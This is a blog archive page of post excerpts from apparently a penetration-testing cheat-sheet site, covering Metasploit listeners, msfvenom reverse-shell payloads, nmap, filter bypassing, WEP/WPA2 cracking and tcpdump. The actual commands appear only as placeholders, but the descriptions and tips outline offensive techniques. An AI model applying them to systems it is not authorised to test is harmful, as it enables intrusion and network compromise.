Posts by JollyFrogs

Kali - msfconsole (Metasploit)

Start meterpreter listener from command line for Linux target: [crayon-5bca265032a59660229052/] Start meterpreter listener from command line for Windows target: [crayon-5bca265032a5e756820138/] Tips: Use "set AutoRunScript post/windows/manage/migrate" to auto-migrate Use "set ReverseListenerBindAddress 10.1.1.10" to force the listener address to a particular IP. This can be handy for exploits that target 127.0.0.1, [..]

Kali - msfvenom

Attacker = 10.1.1.10 Target = 10.1.1.200 Create a Windows reverse shell executable for netcat listener: [crayon-5bca265032cff032002127/] Create a Windows reverse shell executable for Meterpreter listener: [crayon-5bca265032d03634165795/] Create a Linux reverse shell executable for netcat listener: [crayon-5bca265032d05112757879/] Create a Linux reverse shell executable for Meterpreter listener: [crayon-5bca265032d06767931720/] Create a reverse [..]

NMAP

TCP scan a single host (on LAN takes about 60 seconds, on fast VPN can take 5 minutes): [crayon-5bca265032e45411911045/] UDP scan a single host (only top 200 ports, otherwise very slow!): [crayon-5bca265032e48258926069/] Run an intensive scan on the open ports. Scan TCP and UDP separately to speed up the [..]

Bypassing filters

Linux bash commands: [crayon-5bca265032f34482008978/] [crayon-5bca265032f37884331164/] [crayon-5bca265032f39569532809/]    

Various Tools

DBeaver - Client that supports SQL, MySQL, PostgreSQL, MariaDB, SQLite, Oracle, DB2, SQL Server, Sybase, MS Access, Teradata, Firebird, Derby, etc. Reaver - Wireless WPS attack tool PixieWPS - Wireless WPS offline cracker (exploits weak entropy)  

Wireless hacking

WEP - Brute-force key recovery [crayon-5bca265033006393981198/] Keep aireplay-ng running in the background while we start to [crayon-5bca265033009172548923/] With aireplay-ng running, start cracking the WEP key using: [crayon-5bca26503300a933006339/] WPA2 - Crack using a wordlist [crayon-5bca26503300b409291567/] With airodump-ng running in another terminal [crayon-5bca26503300c385953456/] Keep replaying until you have captured the handshake [..]

Useful Commands - Windows

Use winexe to execute a command on Windows remotely [crayon-5bca265033139567031095/]  

Create customized wordlist

Create a wordlist containing words from length 1 to 6 with characters 0-9 and A-F: [crayon-5bca26503323d381768054/] Create a wordlist containing words with length of 4 with characters mixed alpha-numerical [crayon-5bca265033240502191689/] Say you want to create a wordlist with a length of 8, with the following characteristics: [Capital Letter] [2 [..]

tcpdump examples

Capture packets with host 20.20.20.20 and port 110 and write to file: [crayon-5bca26503330f357456332/] Capture ICMP ping requests [crayon-5bca265033314433135256/] Capture ICMP ping replies [crayon-5bca265033316138162911/] Capture packets with DSCP tags [crayon-5bca265033318140695300/] Dump HTTP traffic in ASCII and HEX format [crayon-5bca26503331a094971659/] Grab the user agent from the http header on port 9999 [..]